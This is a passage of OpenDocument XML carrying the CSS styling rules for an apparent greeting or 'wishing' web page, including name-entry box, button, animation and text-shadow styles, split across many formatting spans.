      <text:p text:style-name="P1"><text:span text:style-name="T1127"><text:s/>background: #f</text:span><text:span text:style-name="T1128">8</text:span><text:span text:style-name="T1129">f</text:span><text:span text:style-name="T1130">8</text:span><text:span text:style-name="T1131">f</text:span><text:span text:style-name="T1132">8</text:span><text:span text:style-name="T1133">;</text:span><text:span text:style-name="T1134"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1135"><text:s/></text:span><text:span text:style-name="T1136"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1137">}</text:span><text:span text:style-name="T1138"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1139"><text:s/>.mainContainer {</text:span><text:span text:style-name="T1140"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1141">max-width:<text:s/></text:span><text:span text:style-name="T1142">400</text:span><text:span text:style-name="T1143">px;</text:span><text:span text:style-name="T1144"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1145"><text:s/>margin: auto;</text:span><text:span text:style-name="T1146"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1147"><text:s/>text-align: center;</text:span><text:span text:style-name="T1148"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1149"><text:s/>position: relative;</text:span><text:span text:style-name="T1150"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1151"><text:s/>padding-right:<text:s/></text:span><text:span text:style-name="T1152">1</text:span><text:span text:style-name="T1153">px;</text:span><text:span text:style-name="T1154"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1155"><text:s/>padding-left:<text:s/></text:span><text:span text:style-name="T1156">1</text:span><text:span text:style-name="T1157">px;</text:span><text:span text:style-name="T1158"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1159"><text:s/>padding-top:<text:s/></text:span><text:span text:style-name="T1160">1</text:span><text:span text:style-name="T1161">px;</text:span><text:span text:style-name="T1162"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1163"><text:s/>box-shadow:<text:s/></text:span><text:span text:style-name="T1164">3</text:span><text:span text:style-name="T1165">px<text:s/></text:span><text:span text:style-name="T1166">3</text:span><text:span text:style-name="T1167">px<text:s/></text:span><text:span text:style-name="T1168">23</text:span><text:span text:style-name="T1169">px<text:s/></text:span><text:span text:style-name="T1170">0<text:s/></text:span><text:span text:style-name="T1171">rgba(</text:span><text:span text:style-name="T1172">0</text:span><text:span text:style-name="T1173">,<text:s/></text:span><text:span text:style-name="T1174">0</text:span><text:span text:style-name="T1175">,<text:s/></text:span><text:span text:style-name="T1176">0</text:span><text:span text:style-name="T1177">,<text:s/></text:span><text:span text:style-name="T1178">0.64</text:span><text:span text:style-name="T1179">);</text:span><text:span text:style-name="T1180"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1181"><text:s/>margin-bottom:<text:s/></text:span><text:span text:style-name="T1182">65</text:span><text:span text:style-name="T1183">px;</text:span><text:span text:style-name="T1184"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1185">}</text:span><text:span text:style-name="T1186"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1186"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1186"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1187">.wbncontainer {</text:span><text:span text:style-name="T1188"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1189"><text:s/></text:span><text:span text:style-name="T1190"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1191"><text:s/>padding-right:<text:s/></text:span><text:span text:style-name="T1192">30</text:span><text:span text:style-name="T1193">px;</text:span><text:span text:style-name="T1194"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1195"><text:s/>padding-left:<text:s/></text:span><text:span text:style-name="T1196">30</text:span><text:span text:style-name="T1197">px;</text:span><text:span text:style-name="T1198"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1199"><text:s/>padding-top:<text:s/></text:span><text:span text:style-name="T1200">0</text:span><text:span text:style-name="T1201">px;</text:span><text:span text:style-name="T1202"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1203"><text:s/></text:span><text:span text:style-name="T1204"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1205">}</text:span><text:span text:style-name="T1206"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1206"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1207"><text:s/>}</text:span><text:span text:style-name="T1208"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1208"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1209">.username {</text:span><text:span text:style-name="T1210"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1211"><text:s/>-webkit-animation: bounceIn<text:s/></text:span><text:span text:style-name="T1212">4</text:span><text:span text:style-name="T1213">s cubic-bezier(</text:span><text:span text:style-name="T1214">0.68</text:span><text:span text:style-name="T1215">, -</text:span><text:span text:style-name="T1216">0.55</text:span><text:span text:style-name="T1217">,<text:s/></text:span><text:span text:style-name="T1218">0.27</text:span><text:span text:style-name="T1219">,<text:s/></text:span><text:span text:style-name="T1220">1.55</text:span><text:span text:style-name="T1221">) infinite;</text:span><text:span text:style-name="T1222"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1223"><text:s/>animation: bounceIn<text:s/></text:span><text:span text:style-name="T1224">4</text:span><text:span text:style-name="T1225">s cubic-bezier(</text:span><text:span text:style-name="T1226">0.68</text:span><text:span text:style-name="T1227">, -</text:span><text:span text:style-name="T1228">0.55</text:span><text:span text:style-name="T1229">,<text:s/></text:span><text:span text:style-name="T1230">0.27</text:span><text:span text:style-name="T1231">,<text:s/></text:span><text:span text:style-name="T1232">1.55</text:span><text:span text:style-name="T1233">) infinite;</text:span><text:span text:style-name="T1234"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1235"><text:s/>-webkit-transition: all .</text:span><text:span text:style-name="T1236">2</text:span><text:span text:style-name="T1237">s;</text:span><text:span text:style-name="T1238"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1239"><text:s/>transition: all .</text:span><text:span text:style-name="T1240">2</text:span><text:span text:style-name="T1241">s;</text:span><text:span text:style-name="T1242"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1243"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1244">40</text:span><text:span text:style-name="T1245">px;</text:span><text:span text:style-name="T1246"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1247"><text:s/>font-family: 'SF Espresso Shack', cursive;</text:span><text:span text:style-name="T1248"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1249"><text:s/>text-transform: uppercase;</text:span><text:span text:style-name="T1250"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1251"><text:s/>TEXT-ALIGN:CENTER;</text:span><text:span text:style-name="T1252"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1253"><text:s/>color: #</text:span><text:span text:style-name="T1254">138808</text:span><text:span text:style-name="T1255">;</text:span><text:span text:style-name="T1256"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1257"><text:s/>text-shadow: -</text:span><text:span text:style-name="T1258">2</text:span><text:span text:style-name="T1259">px<text:s/></text:span><text:span text:style-name="T1260">0</text:span><text:span text:style-name="T1261">px<text:s/></text:span><text:span text:style-name="T1262">1</text:span><text:span text:style-name="T1263">px #</text:span><text:span text:style-name="T1264">22414</text:span><text:span text:style-name="T1265">f, -</text:span><text:span text:style-name="T1266">4</text:span><text:span text:style-name="T1267">px<text:s/></text:span><text:span text:style-name="T1268">0</text:span><text:span text:style-name="T1269">px<text:s/></text:span><text:span text:style-name="T1270">1</text:span><text:span text:style-name="T1271">px #</text:span><text:span text:style-name="T1272">22414</text:span><text:span text:style-name="T1273">f, -</text:span><text:span text:style-name="T1274">6</text:span><text:span text:style-name="T1275">px<text:s/></text:span><text:span text:style-name="T1276">0</text:span><text:span text:style-name="T1277">px<text:s/></text:span><text:span text:style-name="T1278">1</text:span><text:span text:style-name="T1279">px #</text:span><text:span text:style-name="T1280">22414</text:span><text:span text:style-name="T1281">f, -</text:span><text:span text:style-name="T1282">1</text:span><text:span text:style-name="T1283">px -</text:span><text:span text:style-name="T1284">1</text:span><text:span text:style-name="T1285">px<text:s/></text:span><text:span text:style-name="T1286">1</text:span><text:span text:style-name="T1287">px #</text:span><text:span text:style-name="T1288">22414</text:span><text:span text:style-name="T1289">f, -</text:span><text:span text:style-name="T1290">1</text:span><text:span text:style-name="T1291">px -</text:span><text:span text:style-name="T1292">2</text:span><text:span text:style-name="T1293">px<text:s/></text:span><text:span text:style-name="T1294">1</text:span><text:span text:style-name="T1295">px #</text:span><text:span text:style-name="T1296">22414</text:span><text:span text:style-name="T1297">f, -</text:span><text:span text:style-name="T1298">2</text:span><text:span text:style-name="T1299">px -</text:span><text:span text:style-name="T1300">1</text:span><text:span text:style-name="T1301">px<text:s/></text:span><text:span text:style-name="T1302">1</text:span><text:span text:style-name="T1303">px #</text:span><text:span text:style-name="T1304">22414</text:span><text:span text:style-name="T1305">f, -</text:span><text:span text:style-name="T1306">2</text:span><text:span text:style-name="T1307">px -</text:span><text:span text:style-name="T1308">2</text:span><text:span text:style-name="T1309">px<text:s/></text:span><text:span text:style-name="T1310">1</text:span><text:span text:style-name="T1311">px #</text:span><text:span text:style-name="T1312">22414</text:span><text:span text:style-name="T1313">f, -</text:span><text:span text:style-name="T1314">3</text:span><text:span text:style-name="T1315">px -</text:span><text:span text:style-name="T1316">3</text:span><text:span text:style-name="T1317">px<text:s/></text:span><text:span text:style-name="T1318">1</text:span><text:span text:style-name="T1319">px #</text:span><text:span text:style-name="T1320">22414</text:span><text:span text:style-name="T1321">f, -</text:span><text:span text:style-name="T1322">4</text:span><text:span text:style-name="T1323">px -</text:span><text:span text:style-name="T1324">4</text:span><text:span text:style-name="T1325">px<text:s/></text:span><text:span text:style-name="T1326">1</text:span><text:span text:style-name="T1327">px #</text:span><text:span text:style-name="T1328">22414</text:span><text:span text:style-name="T1329">f, -</text:span><text:span text:style-name="T1330">5</text:span><text:span text:style-name="T1331">px -</text:span><text:span text:style-name="T1332">5</text:span><text:span text:style-name="T1333">px<text:s/></text:span><text:span text:style-name="T1334">1</text:span><text:span text:style-name="T1335">px #</text:span><text:span text:style-name="T1336">22414</text:span><text:span text:style-name="T1337">f, -</text:span><text:span text:style-name="T1338">6</text:span><text:span text:style-name="T1339">px -</text:span><text:span text:style-name="T1340">6</text:span><text:span text:style-name="T1341">px<text:s/></text:span><text:span text:style-name="T1342">1</text:span><text:span text:style-name="T1343">px #</text:span><text:span text:style-name="T1344">22414</text:span><text:span text:style-name="T1345">f,<text:s/></text:span><text:span text:style-name="T1346">0 0 15</text:span><text:span text:style-name="T1347">px #</text:span><text:span text:style-name="T1348">22414</text:span><text:span text:style-name="T1349">f,<text:s/></text:span><text:span text:style-name="T1350">0 0 20</text:span><text:span text:style-name="T1351">px #</text:span><text:span text:style-name="T1352">22414</text:span><text:span text:style-name="T1353">f,<text:s/></text:span><text:span text:style-name="T1354">1</text:span><text:span text:style-name="T1355">px<text:s/></text:span><text:span text:style-name="T1356">1</text:span><text:span text:style-name="T1357">px #</text:span><text:span text:style-name="T1358">22414</text:span><text:span text:style-name="T1359">f,</text:span><text:span text:style-name="T1360">2</text:span><text:span text:style-name="T1361">px<text:s/></text:span><text:span text:style-name="T1362">2</text:span><text:span text:style-name="T1363">px #</text:span><text:span text:style-name="T1364">22414</text:span><text:span text:style-name="T1365">f;</text:span><text:span text:style-name="T1366"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1366"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1367">}</text:span><text:span text:style-name="T1368"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1369"><text:s/>.fromMessage{</text:span><text:span text:style-name="T1370"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1371"><text:s/></text:span><text:span text:style-name="T1372"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1373"><text:s/></text:span><text:span text:style-name="T1374"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1375"><text:s/></text:span><text:span text:style-name="T1376"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1377"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1378">30</text:span><text:span text:style-name="T1379">px;</text:span><text:span text:style-name="T1380"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1381"><text:s/></text:span><text:span text:style-name="T1382"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1383"><text:s/>}</text:span><text:span text:style-name="T1384"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1385"><text:s/>.wavetext{</text:span><text:span text:style-name="T1386"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1387"><text:s/>color: #</text:span><text:span text:style-name="T1388">3</text:span><text:span text:style-name="T1389">e</text:span><text:span text:style-name="T1390">8</text:span><text:span text:style-name="T1391">ed</text:span><text:span text:style-name="T1392">2</text:span><text:span text:style-name="T1393">;</text:span><text:span text:style-name="T1394"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1395"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T1396">0 40</text:span><text:span text:style-name="T1397">px;</text:span><text:span text:style-name="T1398"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1399"><text:s/>animation: pulse<text:s/></text:span><text:span text:style-name="T1400">1</text:span><text:span text:style-name="T1401">s infinite;</text:span><text:span text:style-name="T1402"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1403"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1404">32</text:span><text:span text:style-name="T1405">px;</text:span><text:span text:style-name="T1406"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1406"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1407"><text:s/>}</text:span><text:span text:style-name="T1408"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1409"><text:s/>.wishMessage {</text:span><text:span text:style-name="T1410"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1411"><text:s/>color: #</text:span><text:span text:style-name="T1412">3</text:span><text:span text:style-name="T1413">e</text:span><text:span text:style-name="T1414">8</text:span><text:span text:style-name="T1415">ed</text:span><text:span text:style-name="T1416">2</text:span><text:span text:style-name="T1417">;</text:span><text:span text:style-name="T1418"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1419"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1420">22</text:span><text:span text:style-name="T1421">px;</text:span><text:span text:style-name="T1422"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1423"><text:s/>font-weight: bold;</text:span><text:span text:style-name="T1424"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1425"><text:s/>margin-top:<text:s/></text:span><text:span text:style-name="T1426">50</text:span><text:span text:style-name="T1427">px;</text:span><text:span text:style-name="T1428"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1429"><text:s/>text-shadow:<text:s/></text:span><text:span text:style-name="T1430">0</text:span><text:span text:style-name="T1431">px<text:s/></text:span><text:span text:style-name="T1432">0</text:span><text:span text:style-name="T1433">px<text:s/></text:span><text:span text:style-name="T1434">10</text:span><text:span text:style-name="T1435">px #</text:span><text:span text:style-name="T1436">00</text:span><text:span text:style-name="T1437">fff</text:span><text:span text:style-name="T1438">3</text:span><text:span text:style-name="T1439"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1440"><text:s/>}</text:span><text:span text:style-name="T1441"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1442"><text:s/>.wishMessage p{</text:span><text:span text:style-name="T1443"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1444"><text:s/>margin:<text:s/></text:span><text:span text:style-name="T1445">0.5</text:span><text:span text:style-name="T1446">em<text:s/></text:span><text:span text:style-name="T1447">0</text:span><text:span text:style-name="T1448">;</text:span><text:span text:style-name="T1449"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1450"><text:s/>}</text:span><text:span text:style-name="T1451"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1452"><text:s/>#formBox {</text:span><text:span text:style-name="T1453"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1454"><text:s/>left:<text:s/></text:span><text:span text:style-name="T1455">0</text:span><text:span text:style-name="T1456">;position: fixed;bottom:<text:s/></text:span><text:span text:style-name="T1457">0</text:span><text:span text:style-name="T1458">;display: inline-block;width:<text:s/></text:span><text:span text:style-name="T1459">100</text:span><text:span text:style-name="T1460">%;margin:<text:s/></text:span><text:span text:style-name="T1461">0</text:span><text:span text:style-name="T1462">;</text:span><text:span text:style-name="T1463"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1464"><text:s/>}</text:span><text:span text:style-name="T1465"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1466"><text:s/>#nameTextBox {</text:span><text:span text:style-name="T1467"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1468"><text:s/>border:<text:s/></text:span><text:span text:style-name="T1469">3</text:span><text:span text:style-name="T1470">px solid #</text:span><text:span text:style-name="T1471">000000</text:span><text:span text:style-name="T1472">;text-align: center;display: inline-block;width:<text:s/></text:span><text:span text:style-name="T1473">80</text:span><text:span text:style-name="T1474">%;color: black;font-size:</text:span><text:span text:style-name="T1475">16</text:span><text:span text:style-name="T1476">px;margin:<text:s/></text:span><text:span text:style-name="T1477">0</text:span><text:span text:style-name="T1478">;background: #eee;height:<text:s/></text:span><text:span text:style-name="T1479">48</text:span><text:span text:style-name="T1480">px;font-weight:<text:s/></text:span><text:span text:style-name="T1481">700</text:span><text:span text:style-name="T1482">;;padding:</text:span><text:span text:style-name="T1483">8</text:span><text:span text:style-name="T1484">px<text:s/></text:span><text:span text:style-name="T1485">0</text:span><text:span text:style-name="T1486">;</text:span><text:span text:style-name="T1487"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1488"><text:s/>}</text:span><text:span text:style-name="T1489"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1490"><text:s/>#goButton {</text:span><text:span text:style-name="T1491"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1492"><text:s/>width:<text:s/></text:span><text:span text:style-name="T1493">20</text:span><text:span text:style-name="T1494">%;background: gold;display: inline-block;vertical-align: bottom;border:<text:s/></text:span><text:span text:style-name="T1495">3</text:span><text:span text:style-name="T1496">px solid #</text:span><text:span text:style-name="T1497">000000</text:span><text:span text:style-name="T1498">;float: right;color: black;font-size:</text:span><text:span text:style-name="T1499">16</text:span><text:span text:style-name="T1500">px;padding:</text:span><text:span text:style-name="T1501">8</text:span><text:span text:style-name="T1502">px<text:s/></text:span><text:span text:style-name="T1503">0</text:span><text:span text:style-name="T1504">;height:<text:s/></text:span><text:span text:style-name="T1505">48</text:span><text:span text:style-name="T1506">px;text-align:center;font-weight:<text:s/></text:span><text:span text:style-name="T1507">700</text:span><text:span text:style-name="T1508">;</text:span><text:span text:style-name="T1509"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1510"><text:s/>}</text:span><text:span text:style-name="T1511"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1512"><text:s/>.footerbtn {</text:span><text:span text:style-name="T1513"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1514"><text:s/>display: none;</text:span><text:span text:style-name="T1515"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1516"><text:s/>line-height:<text:s/></text:span><text:span text:style-name="T1517">15</text:span><text:span text:style-name="T1518">px;</text:span><text:span text:style-name="T1519"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1520"><text:s/>bottom:<text:s/></text:span><text:span text:style-name="T1521">10</text:span><text:span text:style-name="T1522">px;</text:span><text:span text:style-name="T1523"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1524"><text:s/>height:<text:s/></text:span><text:span text:style-name="T1525">40</text:span><text:span text:style-name="T1526">px;</text:span><text:span text:style-name="T1527"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1528"><text:s/>border-radius:<text:s/></text:span><text:span text:style-name="T1529">15</text:span><text:span text:style-name="T1530">px;</text:span><text:span text:style-name="T1531"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1532"><text:s/>box-sizing: border-box;</text:span><text:span text:style-name="T1533"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1534"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T1535">5</text:span><text:span text:style-name="T1536">px;</text:span><text:span text:style-name="T1537"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1538"><text:s/>background: #</text:span><text:span text:style-name="T1539">34</text:span><text:span text:style-name="T1540">af</text:span><text:span text:style-name="T1541">23</text:span><text:span text:style-name="T1542">;</text:span><text:span text:style-name="T1543"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1544"><text:s/>color: #ffffff;</text:span><text:span text:style-name="T1545"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1546"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1547">18</text:span><text:span text:style-name="T1548">px;</text:span><text:span text:style-name="T1549"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1550"><text:s/>text-align: center;</text:span><text:span text:style-name="T1551"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1552"><text:s/>text-decoration: none;</text:span><text:span text:style-name="T1553"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1554"><text:s/>box-shadow:<text:s/></text:span><text:span text:style-name="T1555">0 4</text:span><text:span text:style-name="T1556">px<text:s/></text:span><text:span text:style-name="T1557">12</text:span><text:span text:style-name="T1558">px<text:s/></text:span><text:span text:style-name="T1559">0<text:s/></text:span><text:span text:style-name="T1560">rgba(</text:span><text:span text:style-name="T1561">0</text:span><text:span text:style-name="T1562">,<text:s/></text:span><text:span text:style-name="T1563">0</text:span><text:span text:style-name="T1564">,<text:s/></text:span><text:span text:style-name="T1565">0</text:span><text:span text:style-name="T1566">, .</text:span><text:span text:style-name="T1567">3</text:span><text:span text:style-name="T1568">);</text:span><text:span text:style-name="T1569"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1570"><text:s/></text:span><text:span text:style-name="T1571"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1572"><text:s/>position: fixed;</text:span><text:span text:style-name="T1573"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1574"><text:s/>width:<text:s/></text:span><text:span text:style-name="T1575">90</text:span><text:span text:style-name="T1576">%;</text:span><text:span text:style-name="T1577"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1578"><text:s/>left:<text:s/></text:span><text:span text:style-name="T1579">0</text:span><text:span text:style-name="T1580">;</text:span><text:span text:style-name="T1581"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1582"><text:s/>margin:<text:s/></text:span><text:span text:style-name="T1583">2</text:span><text:span text:style-name="T1584">%<text:s/></text:span><text:span text:style-name="T1585">5</text:span><text:span text:style-name="T1586">%;</text:span><text:span text:style-name="T1587"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1588"><text:s/>}</text:span><text:span text:style-name="T1589"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1590"><text:s/>.footerbtn img {</text:span><text:span text:style-name="T1591"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1592"><text:s/>position: relative;top:</text:span><text:span text:style-name="T1593">3</text:span><text:span text:style-name="T1594">px;</text:span><text:span text:style-name="T1595"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1596"><text:s/>}</text:span><text:span text:style-name="T1597"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1598"><text:s/>#inAdvance {</text:span><text:span text:style-name="T1599"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1600"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1601">20</text:span><text:span text:style-name="T1602">px; font-weight: bold;margin-top:<text:s/></text:span><text:span text:style-name="T1603">20</text:span><text:span text:style-name="T1604">px;color: #</text:span><text:span text:style-name="T1605">98201</text:span><text:span text:style-name="T1606">F;</text:span><text:span text:style-name="T1607"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1608"><text:s/>}</text:span><text:span text:style-name="T1609"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1610"><text:s/>#demoo {</text:span><text:span text:style-name="T1611"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1612"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1613">20</text:span><text:span text:style-name="T1614">px; font-weight: bold;color: #</text:span><text:span text:style-name="T1615">98201</text:span><text:span text:style-name="T1616">F;</text:span><text:span text:style-name="T1617"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1618"><text:s/></text:span><text:span text:style-name="T1619"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1620"><text:s/>}</text:span><text:span text:style-name="T1621"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1622"><text:s/>#inAdvanceTime {</text:span><text:span text:style-name="T1623"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1624"><text:s/>margin:</text:span><text:span text:style-name="T1625">20</text:span><text:span text:style-name="T1626">px<text:s/></text:span><text:span text:style-name="T1627">0 30</text:span><text:span text:style-name="T1628">px<text:s/></text:span><text:span text:style-name="T1629">0</text:span><text:span text:style-name="T1630">;</text:span><text:span text:style-name="T1631"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1632"><text:s/>}</text:span><text:span text:style-name="T1633"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1634"><text:s/>#inAdvanceTime p{</text:span><text:span text:style-name="T1635"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1636"><text:s/>color: #ae</text:span><text:span text:style-name="T1637">00</text:span><text:span text:style-name="T1638">b</text:span><text:span text:style-name="T1639">9</text:span><text:span text:style-name="T1640">;font-size:<text:s/></text:span><text:span text:style-name="T1641">19</text:span><text:span text:style-name="T1642">px;font-weight:<text:s/></text:span><text:span text:style-name="T1643">500</text:span><text:span text:style-name="T1644">;</text:span><text:span text:style-name="T1645"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1646"><text:s/>margin:<text:s/></text:span><text:span text:style-name="T1647">0</text:span><text:span text:style-name="T1648">;</text:span><text:span text:style-name="T1649"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1650"><text:s/>}</text:span><text:span text:style-name="T1651"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1652">.bg{background-image:url(img/bg.gif);background-repeat:repeat}p.head.name{word-wrap: break-word;font-size:</text:span><text:span text:style-name="T1653">40</text:span><text:span text:style-name="T1654">px;font-family:sans-serif;text-shadow:<text:s/></text:span><text:span text:style-name="T1655">1</text:span><text:span text:style-name="T1656">px<text:s/></text:span><text:span text:style-name="T1657">1</text:span><text:span text:style-name="T1658">px<text:s/></text:span><text:span text:style-name="T1659">5</text:span><text:span text:style-name="T1660">px rgba(</text:span><text:span text:style-name="T1661">0</text:span><text:span text:style-name="T1662">,<text:s/></text:span><text:span text:style-name="T1663">0</text:span><text:span text:style-name="T1664">,<text:s/></text:span><text:span text:style-name="T1665">0</text:span><text:span text:style-name="T1666">,<text:s/></text:span><text:span text:style-name="T1667">0.5</text:span><text:span text:style-name="T1668">);color:#f</text:span><text:span text:style-name="T1669">5</text:span><text:span text:style-name="T1670">f</text:span><text:span text:style-name="T1671">5</text:span><text:span text:style-name="T1672">f</text:span><text:span text:style-name="T1673">5</text:span><text:span text:style-name="T1674">}input#mce-names {width:<text:s/></text:span><text:span text:style-name="T1675">100</text:span><text:span text:style-name="T1676">% !important;margin-top:<text:s/></text:span><text:span text:style-name="T1677">20</text:span><text:span text:style-name="T1678">px !important;}</text:span><text:span text:style-name="T1679"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1679"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1680">.wb-main-greeting {</text:span><text:span text:style-name="T1681"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1682"><text:s/></text:span><text:span text:style-name="T1683"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1684"><text:s/>max-width:<text:s/></text:span><text:span text:style-name="T1685">400</text:span><text:span text:style-name="T1686">px;</text:span><text:span text:style-name="T1687"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1688"><text:s/>margin: auto;</text:span><text:span text:style-name="T1689"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1690"><text:s/>text-align: center;</text:span><text:span text:style-name="T1691"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1692"><text:s/>position: relative;</text:span><text:span text:style-name="T1693"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1694"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T1695">0</text:span><text:span text:style-name="T1696">px;</text:span><text:span text:style-name="T1697"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1698"><text:s/>background:#</text:span><text:span text:style-name="T1699">000</text:span><text:span text:style-name="T1700">;</text:span><text:span text:style-name="T1701"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1702"><text:s/>background: url("");</text:span><text:span text:style-name="T1703"/></text:p>
